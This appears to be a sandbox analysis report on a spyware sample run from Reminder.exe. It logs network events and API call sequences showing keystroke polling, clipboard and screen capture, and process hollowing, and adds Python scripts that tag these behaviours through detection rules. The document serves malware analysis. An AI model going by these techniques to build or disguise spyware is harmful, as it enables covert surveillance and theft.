Source: unknown Network traffic detected: HTTP traffic on port 57856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57957 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57889
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57888
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57887
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57892
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57895
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57894
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57770
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57891
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57890
Source: unknown Network traffic detected: HTTP traffic on port 57992 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57981 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57889 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57897
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57896
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57899
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57898
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57782
Source: unknown Network traffic detected: HTTP traffic on port 57728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57784
Source: unknown Network traffic detected: HTTP traffic on port 57946 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57780
Source: unknown Network traffic detected: HTTP traffic on port 57854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57789
Source: unknown Network traffic detected: HTTP traffic on port 57888 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57788
Source: unknown Network traffic detected: HTTP traffic on port 57727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57790
Source: unknown Network traffic detected: HTTP traffic on port 57807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57792
Source: unknown Network traffic detected: HTTP traffic on port 57968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57791
Source: unknown Network traffic detected: HTTP traffic on port 57769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57912 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57797
Source: unknown Network traffic detected: HTTP traffic on port 57792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57799
Source: unknown Network traffic detected: HTTP traffic on port 57750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57993 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57877 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57725
Source: unknown Network traffic detected: HTTP traffic on port 57770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57967
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57845
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57969
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57847
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57962
Source: unknown Network traffic detected: HTTP traffic on port 57793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57965
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57843
Source: unknown Network traffic detected: HTTP traffic on port 57901 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57964
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57970
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57730
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57972
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57850
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57971
Source: unknown Network traffic detected: HTTP traffic on port 57809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57876 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57899 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57735
Source: unknown Network traffic detected: HTTP traffic on port 57830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57977
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57859
Source: unknown Network traffic detected: HTTP traffic on port 57864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57974
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57973
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57976
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57975
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57981
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57980
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57983
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57982
Source: unknown Network traffic detected: HTTP traffic on port 57970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57747
Source: unknown Network traffic detected: HTTP traffic on port 57865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57989
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57988
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57864
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57866
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57987
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57865
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57986
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57750
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57871
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57992
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57870
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57991
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57873
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57872
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57993
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57990
Source: unknown Network traffic detected: HTTP traffic on port 57782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57935 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57958 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57879
Source: unknown HTTPS traffic detected: 13.107.246.51:443 -> 192.168.2.4:57712 version: TLS 1.2
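The port lines above list each direction of a connection as its own event ("57754 -> 443" for the client side, "443 -> 57754" for the server's reply), so counting lines overstates the number of connections. The following is an added example, not part of the report or of Joe Sandbox, that pairs the two directions by client-side ephemeral port, reports ports seen in only one direction, and pulls out the TLS session line. The input is a constructed excerpt of the lines above.

```python
"""Summarise 'Network traffic detected' lines from a sandbox report.

Added example (not the report's own code). It pairs the outbound
'client -> 443' and inbound '443 -> client' events by client port so
that the count reflects connections rather than log lines, and parses
the 'HTTPS traffic detected' line that shows the traffic is TLS.
"""
import re
from collections import Counter

# Constructed excerpt of the report's network lines (not the full list).
SAMPLE_LINES = """\
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57922
Source: unknown Network traffic detected: HTTP traffic on port 57754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57754
Source: unknown Network traffic detected: HTTP traffic on port 57925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57925
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown HTTPS traffic detected: 13.107.246.51:443 -> 192.168.2.4:57712 version: TLS 1.2
"""

PORT_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
TLS_RE = re.compile(
    r"HTTPS traffic detected: (\S+):(\d+) -> (\S+):(\d+) version: (TLS [\d.]+)"
)
SERVICE_PORT = 443  # the server-side port every line in this section uses


def parse_flows(text):
    """Return (outbound, inbound, tls): per-client-port counters and TLS records."""
    outbound, inbound, tls = Counter(), Counter(), []
    for line in text.splitlines():
        m = PORT_RE.search(line)
        if m:
            src, dst = int(m.group(1)), int(m.group(2))
            if dst == SERVICE_PORT:
                outbound[src] += 1      # client -> server
            elif src == SERVICE_PORT:
                inbound[dst] += 1       # server -> client
            continue
        m = TLS_RE.search(line)
        if m:
            tls.append({
                "server": m.group(1), "server_port": int(m.group(2)),
                "client": m.group(3), "client_port": int(m.group(4)),
                "version": m.group(5),
            })
    return outbound, inbound, tls


def summarise(text):
    """Connection-level view of the port lines."""
    outbound, inbound, tls = parse_flows(text)
    clients = set(outbound) | set(inbound)
    return {
        "distinct_client_ports": len(clients),
        "client_port_range": (min(clients), max(clients)) if clients else None,
        # both directions seen: a complete request/response pair
        "bidirectional": sorted(set(outbound) & set(inbound)),
        # only one direction logged: the other event is elsewhere or missing
        "inbound_only": sorted(set(inbound) - set(outbound)),
        "outbound_only": sorted(set(outbound) - set(inbound)),
        "tls_sessions": tls,
    }


if __name__ == "__main__":
    for key, value in summarise(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

Run it over the full block of port lines to get the real number of distinct client ports; a tight, near-contiguous ephemeral range such as the 577xx-579xx values here indicates many short-lived connections opened back to back rather than one long session. The sandbox labels the traffic "HTTP" by port; the separate "HTTPS traffic detected" line is what confirms it was TLS 1.2.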
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074F664 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 35_2_0074F664
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074F8D3 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 35_2_0074F8D3
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CEF8D3 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 38_2_00CEF8D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_004064C0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority, 41_2_004064C0
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073AA95 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 35_2_0073AA95
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00769FB4 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 35_2_00769FB4
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00D09FB4 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 38_2_00D09FB4
Source: Yara match File source: Process Memory Space: Updater.exe PID: 1612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AutoIt3.exe PID: 2536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AutoIt3.exe PID: 3272, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B5BC9 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject, 35_2_014B5BC9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B9051 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount, 35_2_014B9051
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_016688E9 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount, 38_2_016688E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_00429C1A NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 41_2_00429C1A
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073E3CB: CreateFileW,DeviceIoControl,CloseHandle, 35_2_0073E3CB
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073230F LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 35_2_0073230F
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073F76E ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 35_2_0073F76E
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CDF76E ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 38_2_00CDF76E
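The "Code function" lines above are raw API call sequences; the capability each one implies (clipboard read versus write, screen capture, keystroke polling, the CreateProcess/NtQueryInformationProcess/WriteProcessMemory/ResumeThread chain behind the injection signature, LogonUserW plus CreateProcessAsUserW, shutdown) has to be inferred by the reader. The following is an added example, not code from the report or from the sample, that parses these lines and tags each function with the capability its call order implies. The rule table is my own heuristic set chosen to cover the functions listed here, and the input is a constructed excerpt of the lines above (the MSBuild.exe line is trimmed to the calls that matter).

```python
"""Tag sandbox 'Code function' lines with the capability the API sequence implies.

Added example (not the report's own code). Each rule is an ordered tuple of
API names; a function gets the tag when those names appear in that relative
order in its call list, which matters for patterns such as process
hollowing (create suspended, query, write, resume).
"""
import re

# Constructed excerpt of the report's evidence lines (MSBuild line trimmed).
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074F664 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,DragQueryFileW,CountClipboardFormats,CloseClipboard, 35_2_0074F664
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074F8D3 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 35_2_0074F8D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_004064C0 GdiplusStartup,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipSaveImageToFile,GetUserNameA,LookupAccountNameA, 41_2_004064C0
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073AA95 GetKeyboardState,GetAsyncKeyState,GetKeyState, 35_2_0073AA95
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B5BC9 CreateDesktopA,CreateProcessA,CreateProcessA,WaitForSingleObject, 35_2_014B5BC9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B9051 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount, 35_2_014B9051
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073E3CB: CreateFileW,DeviceIoControl,CloseHandle, 35_2_0073E3CB
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073230F LogonUserW,DuplicateTokenEx,CloseHandle,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile, 35_2_0073230F
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073F76E ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 35_2_0073F76E
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006D7070 35_2_006D7070
"""

# Line shape: 'Source: <image> Code function: <id>[:] [<api>,<api>,...,] <id>'
FUNC_RE = re.compile(
    r"^Source: (?P<image>\S+) Code function: (?P<id>\S+?):? (?:(?P<apis>\S+) )?(?P=id)$"
)

# Heuristic rules (assumed, not from the report): ordered API tuples.
RULES = {
    "clipboard-read":      ("OpenClipboard", "GetClipboardData", "CloseClipboard"),
    "clipboard-write":     ("OpenClipboard", "SetClipboardData"),
    "screenshot":          ("GdiplusStartup", "BitBlt", "GdipSaveImageToFile"),
    "keystroke-polling":   ("GetAsyncKeyState",),
    "process-hollowing":   ("CreateProcessA", "NtQueryInformationProcess",
                            "WriteProcessMemory", "ResumeThread"),
    "hidden-desktop-exec": ("CreateDesktopA", "CreateProcessA"),
    "run-as-other-user":   ("LogonUserW", "CreateProcessAsUserW"),
    "device-driver-io":    ("CreateFileW", "DeviceIoControl"),
    "shutdown-reboot":     ("ExitWindowsEx", "InitiateSystemShutdownExW"),
    "user-sid-lookup":     ("GetUserNameA", "LookupAccountNameA"),
}


def parse_code_functions(text):
    """Yield (image, function_id, [api, ...]) for every well-formed line."""
    for line in text.splitlines():
        m = FUNC_RE.match(line.strip())
        if not m:
            continue
        apis = [a for a in (m.group("apis") or "").split(",") if a]
        yield m.group("image"), m.group("id"), apis


def is_subsequence(required, apis):
    """True if every name in `required` appears in `apis` in that relative order."""
    it = iter(apis)
    return all(any(a == want for a in it) for want in required)


def tag_apis(apis):
    """Capability tags whose ordered rule is satisfied by this call list."""
    return [name for name, seq in RULES.items() if is_subsequence(seq, apis)]


def capabilities_by_image(text):
    """{image: {function_id: [tag, ...]}} for functions that matched a rule."""
    result = {}
    for image, fid, apis in parse_code_functions(text):
        tags = tag_apis(apis)
        if tags:
            result.setdefault(image, {})[fid] = tags
    return result


if __name__ == "__main__":
    for image, funcs in capabilities_by_image(SAMPLE_LINES).items():
        print(image)
        for fid, tags in funcs.items():
            print(f"  {fid}: {', '.join(tags)}")
```

Ordering is the point of the check: CreateProcessA followed by WriteProcessMemory and then ResumeThread is the shape of a suspended-process write-and-resume, while the same three names in another order (or ReadProcessMemory alone) is not. Functions whose line carries no API list, such as 35_2_006D7070, yield no tags and are skipped rather than guessed at.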
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0042B460 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0042AD72 appears 68 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 00424030 appears 131 times
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: String function: 006F488E appears 34 times
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: String function: 006F1000 appears 41 times
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: String function: 006F014F appears 40 times
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: String function: 006DFA3B appears 33 times
Source: C:\edgheaa\AutoIt3.exe Code function: String function: 00C7FA3B appears 33 times
Source: C:\edgheaa\AutoIt3.exe Code function: String function: 00C9488E appears 34 times
Source: C:\edgheaa\AutoIt3.exe Code function: String function: 00C91000 appears 41 times
Source: C:\edgheaa\AutoIt3.exe Code function: String function: 00C9014F appears 40 times
Source: Reminder.exe Static PE information: invalid certificate
Source: Reminder.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Reminder.tmp.2.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Reminder.exe Static PE information: Number of sections : 11 > 10
Source: Reminder.tmp.0.dr Static PE information: Number of sections : 11 > 10
Source: Reminder.tmp.2.dr Static PE information: Number of sections : 11 > 10
Source: Reminder.exe, 00000000.00000003.1680434117.000000000308E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs Reminder.exe
Source: Reminder.exe, 00000000.00000000.1678861774.0000000000919000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs Reminder.exe
Source: Reminder.exe, 00000000.00000003.1680920376.000000007F5BA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs Reminder.exe
Source: Reminder.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal92.troj.spyw.evad.winEXE@73/16@0/2
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00744573 GetLastError,FormatMessageW, 35_2_00744573
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_007321C9 AdjustTokenPrivileges,CloseHandle, 35_2_007321C9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_007327D9 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 35_2_007327D9
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CD21C9 AdjustTokenPrivileges,CloseHandle, 38_2_00CD21C9
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CD27D9 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 38_2_00CD27D9
